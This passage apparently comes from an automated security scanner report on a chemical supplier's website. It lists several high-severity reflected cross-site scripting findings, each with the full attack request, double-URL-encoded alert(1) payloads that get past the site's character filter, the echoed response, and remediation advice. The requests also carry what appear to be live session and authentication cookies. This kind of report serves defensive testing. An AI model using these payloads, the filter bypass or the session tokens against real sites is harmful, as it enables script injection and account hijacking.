Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:45 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services14ae7";alert(1)//a376a5f7f23","E404") ;
   </script>
...[SNIP]...

1.198. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83a71%2522%253balert%25281%2529%252f%252f4e9b2e06d4b was submitted in the REST URL parameter 1. This input was echoed as 83a71";alert(1)//4e9b2e06d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content83a71%2522%253balert%25281%2529%252f%252f4e9b2e06d4b/sigma-aldrich/customer-support/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content83a71";alert(1)//4e9b2e06d4b/sigma-aldrich/customer-support/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.199. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79c5%2522%253balert%25281%2529%252f%252f0527dafe1d was submitted in the REST URL parameter 2. This input was echoed as d79c5";alert(1)//0527dafe1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd79c5%2522%253balert%25281%2529%252f%252f0527dafe1d/customer-support/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd79c5";alert(1)//0527dafe1d/customer-support/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.200. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600d9%2522%253balert%25281%2529%252f%252fc38a9c4497e was submitted in the REST URL parameter 3. This input was echoed as 600d9";alert(1)//c38a9c4497e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support600d9%2522%253balert%25281%2529%252f%252fc38a9c4497e/customer-service/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support600d9";alert(1)//c38a9c4497e/customer-service/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.201. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12900%2522%253balert%25281%2529%252f%252f47c04f4e82c was submitted in the REST URL parameter 4. This input was echoed as 12900";alert(1)//47c04f4e82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service12900%2522%253balert%25281%2529%252f%252f47c04f4e82c/services/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service12900";alert(1)//47c04f4e82c/services/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.202. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40771%2522%253balert%25281%2529%252f%252f543c7fd8ffa was submitted in the REST URL parameter 5. This input was echoed as 40771";alert(1)//543c7fd8ffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services40771%2522%253balert%25281%2529%252f%252f543c7fd8ffa/product-process-develop HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
